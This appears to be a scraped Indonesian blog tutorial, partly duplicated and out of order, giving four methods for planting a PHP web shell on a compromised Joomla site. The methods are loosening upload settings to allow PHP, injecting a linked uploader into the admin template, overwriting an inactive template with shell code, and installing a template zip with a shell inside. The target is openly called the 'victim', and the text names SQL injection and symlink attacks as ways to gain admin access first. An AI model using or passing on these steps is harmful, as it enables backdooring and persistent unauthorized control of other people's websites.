buat yg belom punya uploader, bisa ngambil disini --> https://www.dropbox.com/s/00ahiykruwdpm3...der.txt... yang ane inget ini yg d kasih om vergos303
mari kita sisipin uploadernya, ane taro dibawah aja.
klo udah. save aja.
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.
setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php
CARA 3
masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.
kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita
klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php
CARA 4
lagi lagi pake template.
kali ini kita coba upload template baru yg udah kita sisipin shell.
cari aja sembarang template joomla, sesuaiin kompatibilitasnya dg versi joomlanya.
contoh : ane download template siteground. klo udah, ekstrak aja templatenya. trus masukin shell kita. terserah mo ditaro dimana
misal: di dlm folder images/namashell.php
klo udah kita archive lg templatenya. bentuknya *.zip ya..
klo udah oke, kita upload ke korban.
masuk ke extension> install/uninstall trus upload dah, template kita td :P
setelah sukses upload. skrng kita cek, dimana lokasi shell kita. masuk ke template manager. trus klik nama template yg baru saja kita tambahin.
ane td install template siteground. liat bagian kanan, ada parameters.
bagian merah, itu lokasi shell kita. tinggal kita sesuaiin dimana kita naro shellnya td. klo ane td masukin di folder images.
jd lokasi shellnya ada di http://korban.com/templates/siteground-j...ashell.php
hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.
soalnya pernah juga nemu site yg kgak bisa pake ke empat cara diatas.
okedeh, sekian tutorial cupu bin jadul. dr ane.
ini buat joomla versi 2.5.x
kali aja ada yg belom tau, kaya newbie seperti ane.
okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.
CARA 1
masuk ke menu site > global configuration. trus klik bagian system
perhatikan bagian media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.
udah ke upload , lokasi shell ada di http://korban.com/images/namashell.php
CARA 2
secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :P
Klik menu Extension > template manager
trus pergi di bagian administrator.
kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.
kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
buat yg belom punya uploader, bisa ngambil disini --> https://www.dropbox.com/s/00ahiykruwdpm3...der.txt... yang ane inget ini yg d kasih om vergos303
mari kita sisipin uploadernya, ane taro dibawah aja.
klo udah. save aja.
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.
setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php
CARA 3
masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.
kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita
klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php
CARA 4
lagi lagi pake template.
kali ini kita coba upload template baru yg udah kita sisipin shell.
cari aja sembarang template joomla, sesuaiin kompatibilitasnya dg versi joomlanya.
contoh : ane download template siteground. klo udah, ekstrak aja templatenya. trus masukin shell kita. terserah mo ditaro dimana
misal: di dlm folder images/namashell.php
klo udah kita archive lg templatenya. bentuknya *.zip ya..
klo udah oke, kita upload ke korban.
masuk ke extension> install/uninstall trus upload dah, template kita td :P
setelah sukses upload. skrng kita cek, dimana lokasi shell kita. masuk ke template manager. trus klik nama template yg baru saja kita tambahin.
ane td install template siteground. liat bagian kanan, ada parameters.
bagian merah, itu lokasi shell kita. tinggal kita sesuaiin dimana kita naro shellnya td. klo ane td masukin di folder images.
jd lokasi shellnya ada di http://korban.com/templates/siteground-j...ashell.php
hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.
soalnya pernah juga nemu site yg kgak bisa pake ke empat cara diatas.
okedeh, sekian tutorial cupu bin jadul. dr ane.
ini buat joomla versi 2.5.x
Subscribe to:
Posts (Atom)